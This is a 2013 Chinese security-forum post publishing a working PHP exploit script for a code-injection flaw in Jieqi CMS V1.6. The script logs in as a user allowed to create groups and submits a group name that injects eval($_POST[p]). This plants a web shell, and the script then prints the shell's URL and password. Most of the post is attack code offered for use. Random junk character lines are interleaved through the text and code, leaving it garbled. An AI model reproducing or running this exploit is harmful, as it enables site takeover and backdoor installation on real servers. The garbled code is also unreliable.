中国网络渗透测试联盟
标题:
Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP
[打印本页]
作者:
admin
时间:
2013-2-23 11:28
标题:
Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP
杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
& }: p# z# X0 c7 U# n) @
, f+ r) t; A; c
1 f6 m5 r( X/ n$ E0 s6 r
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
# J2 B; `$ y/ v' ]5 e
需要有一个能创建圈子的用户。
1 x2 i- l/ s' k" N( e7 b: @
# ~+ B1 U* w# N) S+ J0 n8 P; p9 j) L
<?php
* F' t `% V; G# s# @0 a0 `% @
1 ]+ A! W2 L+ l0 [6 s' x
print_r('
$ a w: F/ `) l* w4 u
+---------------------------------------------------------------------------+
0 X* v: ?$ l) Q; T r7 r0 ^
Jieqi CMS V1.6 PHP Code Injection Exploit
7 T8 B& X7 }1 P1 W" x
by flyh4t
5 ?9 g+ E+ _7 [* ~
mail: phpsec at hotmail dot com
9 A, G: |+ M0 e5 V
team:
http://www.wolvez.org
- @$ E1 a) ]" P9 o$ u9 [) u7 D( H
+---------------------------------------------------------------------------+
( {/ R( G# d! I8 k- h2 g' }# l8 U
'); /**
2 s% x, i) g7 T& D% w4 K& M: I
* works regardless of php.ini settings
) C2 k/ w3 U. J, e" Q& O. z0 {
*/ if ($argc < 5) { print_r('
) V; u- W& ^) Y! c" _8 H, z' f
+---------------------------------------------------------------------------+
6 w: j! i8 F( E9 H! [
Usage: php '.$argv[0].' host path username
V3 v* O5 @' F4 E6 v- c% C, S
host: target server (ip/hostname)
1 I6 R2 U. v! t O
path: path to jieqicms
{) D% y8 R3 I
uasename: a username who can create group
]/ B, b+ M8 n: Z* i( `3 n `
Example:
7 \5 L* e; F8 u, `" o4 L
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
: z6 v& j B7 `* D" R9 G0 l
+---------------------------------------------------------------------------+
9 e3 o7 d" H$ T. b; Q; o
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
; F8 e; W3 k5 E8 C+ u
Content-Disposition: form-data; name="gname"
0 o5 s( w* s4 t+ X2 U
6 K. ?" a# F/ o, ^3 t, g! R
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
: I" P; o8 b" ~8 s+ o% G/ J
-----------------------------23281168279961
$ z1 J% S; Q. w+ S6 ?5 ~1 Q
Content-Disposition: form-data; name="gcatid"
# G) ~2 Q6 N7 F2 }- X3 j. i0 x
+ i$ z6 X& r$ R
1
( R4 M6 ^+ u; l4 v2 V9 I7 J" @
-----------------------------23281168279961
9 _) b1 B. M1 K% E+ E$ H& y
Content-Disposition: form-data; name="gaudit"
; z. n2 {& t- X0 p1 O; t, H
# h) x+ ^$ j+ j8 p) J
1
. g9 Q. d9 U! }
-----------------------------23281168279961
9 A1 _# j5 u! A4 z R
Content-Disposition: form-data; name="gbrief"
; Z8 A9 o: Y9 b. s- A
5 D# I3 \5 N0 n' U
1
n2 V8 i% {6 k
-----------------------------23281168279961--
! g% n) j0 ]" e/ N
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean();
www.2cto.com
7 H5 B0 ?; n3 X( ]! N
* I, K- I& C7 l& S" p7 |2 j
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url;
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2